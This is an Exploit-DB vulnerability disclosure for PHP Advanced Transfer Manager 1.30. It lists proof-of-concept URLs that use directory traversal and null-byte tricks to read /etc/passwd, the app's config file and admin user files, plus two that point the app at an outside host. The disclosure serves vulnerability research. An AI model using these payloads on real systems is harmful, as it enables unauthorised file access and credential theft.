PHP Advanced Transfer Manager 1.30 - Multiple Directory Traversal Vulnerabilities

EDB-ID:

26286

CVE:

N/A


Author:

rgod

Type:

webapps


Platform:

PHP

Date:

2005-09-20


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux and pass the exam to become an Offensive Security Certified Professional (OSCP). All new content for 2020.

GET CERTIFIED

source: https://www.securityfocus.com/bid/14883/info

PHP Advanced Transfer Manager is prone to multiple directory traversal vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.

Exploitation of any of these vulnerabilities could lead to a loss of confidentiality. Information obtained may aid in further attacks against the underlying system; other attacks are also possible. 

http://www.example.com/phpatm/viewers/txt.php?currentdir=../../../../../../../etc/passwd%00
http://www.example.com/phpatm/viewers/txt.php?currentdir=../../../../../../../etc&filename=passwd
http://www.example.com/phpatm/viewers/htm.php?current_dir=../../../../../../../etc/passwd%00
http://www.example.com/phpatm/viewers/htm.php?current_dir=../../../../../../../etc&filename=passwd
http://www.example.com/phpatm/viewers/html.php?current_dir=../../../../../../../etc/passwd%00
http://www.example.com/phpatm/viewers/html.php?current_dir=../../../../../../../etc&filename=passwd
http://www.example.com/phpatm/viewers/htm.php?current_dir=http://www.asite.com%00
http://www.example.com/phpatm/html.php?current_dir=http:/&filename=www.asite.com
http://www.example.com/phpatm/viewers/zip.php?current_dir=../../../../../../../[filename].zip%00
http://www.example.com/phpatm/viewers/zip.php?current_dir=../../../../../../..&filename=[filename].zip
http://www.example.com/phpatm/viewers/txt.php?current_dir=../include&filename=conf.php
http://www.example.com/phpatmviewers/txt.php?current_dir=../userstat&filename=[admin_name].stat
http://www.example.com/phpatm/viewers/txt.php?current_dir=../users/admin%00
http://www.example.com/phpatm/viewers/txt.php?current_dir=../users/[admin_name]%00